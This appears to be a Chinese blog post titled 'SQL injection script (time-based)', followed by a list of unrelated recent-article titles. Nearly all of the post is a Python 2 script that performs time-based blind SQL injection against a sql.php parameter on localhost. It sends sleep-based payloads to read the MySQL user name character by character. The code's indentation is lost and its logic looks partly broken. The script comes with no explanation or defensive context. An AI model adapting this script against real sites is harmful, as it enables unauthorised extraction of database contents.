SQL注入脚本(基于时间)
2024-09-13 12:33:52
#encoding=utf-8
import httplib
import time
import string
import sys
import urllib
header = {'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Charset':'GB2312,utf-8;q=0.7,*;q=0.7',
'Accept-Language':'zh-cn,zh;q=0.5',
'Cache-Control':'max-age=0',
'Connection':'keep-alive',
'Keep-Alive':'',
'User-Agent':'Mozilla/5.0 (X11; U; Linux x86_64; zh-CN; rv:1.9.2.14) Gecko/20110221 Ubuntu/10.10 (maverick) Firefox/3.6.14'} payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'
print '[%s] Start to retrive MySQL User:' % time.strftime('%H:%M:%S', time.localtime())
user = ''
for i in range(1, 21):
for payload in payloads:
try: s = "ascii(mid(lower(user()),%s,1))=%s" % (i, ord(payload))
s = " and (if(%s,sleep(3),0))#" % s
conn = httplib.HTTPConnection('127.0.0.1', timeout=3)
conn.request(method='GET', url="/sql.php?cmd=1%s" % urllib.quote(s),headers=header) conn.getresponse()
conn.close()
# print '.',
except Exception,e:
# print e
user += payload
print '\n[surprise]:', user,
time.sleep(3.0)
break
print '\n[Done] MySQL user is %s' % user
最新文章
- gpu对任意长度的矢量求和
- sizeof和strlen的区别
- nwjs如何打包文件为exe文件并修改exe图标
- tracert 命令详解
- Docker 基础技术:Linux Namespace(下)
- Dynamic Programming (DP) 问题总结
- 在Quick-cocos2dx中使用云风pbc解析Protocol Buffers,支持win、mac、ios、android
- 【转】BLE开发的各种坑
- vue2.0实践 —— Node + vue 实现移动官网
- AttributeError: 'module' object has no attribute 'enableTrace'
- vue-引入外部js文件的方法和常量
- [sharepoint]修改Item或者File的Author和Editor
- Request processing failed; nested exception is java.lang.IllegalStateException: getOutputStream() has already been called for this response
- sql server alwayson 可用性组 只读路由的设置
- windows安装redis的正确姿势
- Webform和MVC,为什么MVC更好一些?(转)
- bzoj1607
- ACM1001:Sum Problem
- Codeforces Round #299 (Div. 2) D. Tavas and Malekas kmp
- 一款仿ios7的switches开关按钮